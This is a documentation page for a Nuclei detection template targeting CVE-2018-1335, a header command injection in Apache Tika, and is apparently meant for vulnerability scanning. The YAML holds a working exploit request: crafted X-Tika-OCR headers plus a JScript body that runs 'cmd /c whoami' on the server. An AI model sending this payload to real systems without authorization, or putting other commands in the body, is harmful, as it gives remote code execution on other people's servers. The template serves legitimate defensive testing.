Skip to content
Nuclei Templates

Apache Tika <1.1.8- Header Command Injection

ID: CVE-2018-1335

Severity: high

Author: pikpikcu

Tags: cve,cve2018,packetstorm,edb,apache,tika,rce,intrusive

Description

Section titled “Description”

Apache Tika versions 1.7 to 1.17 allow clients to send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This vulnerability only affects those running tika-server on a server that is open to untrusted clients.

YAML Source

Section titled “YAML Source”
id: CVE-2018-1335


info:
  name: Apache Tika <1.1.8-  Header Command Injection
  author: pikpikcu
  severity: high
  description: Apache Tika versions 1.7 to 1.17 allow clients to send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This vulnerability only affects those running tika-server on a server that is open to untrusted clients.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected server.
  remediation: Upgrade to Tika 1.18.
  reference:
    - https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/
    - https://www.exploit-db.com/exploits/47208
    - https://lists.apache.org/thread.html/b3ed4432380af767effd4c6f27665cc7b2686acccbefeb9f55851dca@%3Cdev.tika.apache.org%3E
    - https://nvd.nist.gov/vuln/detail/CVE-2018-1335
    - http://packetstormsecurity.com/files/153864/Apache-Tika-1.17-Header-Command-Injection.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2018-1335
    epss-score: 0.96745
    epss-percentile: 0.99664
    cpe: cpe:2.3:a:apache:tika:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: apache
    product: tika
  tags: cve,cve2018,packetstorm,edb,apache,tika,rce,intrusive


http:
  - method: PUT
    path:
      - "{{BaseURL}}/meta"


    body: var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec("cmd /c whoami");


    headers:
      X-Tika-OCRTesseractPath: cscript
      X-Tika-OCRLanguage: //E:Jscript
      Expect: 100-continue
      Content-type: image/jp2
      Connection: close


    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "Content-Type: text/csv"


      - type: word
        part: body
        words:
          - org.apache.tika.parser.DefaultParser
          - org.apache.tika.parser.gdal.GDALParse
        condition: and


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100dc49659d5f4124e6893f714902beb791c99f383379b3eb3509d5adf2ee1c2b4c022038d2acfe37edb43491c68c361fbc44cf98b7e84fb71fb4ca0ba1182136d6a99a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-1335.yaml"

View on Github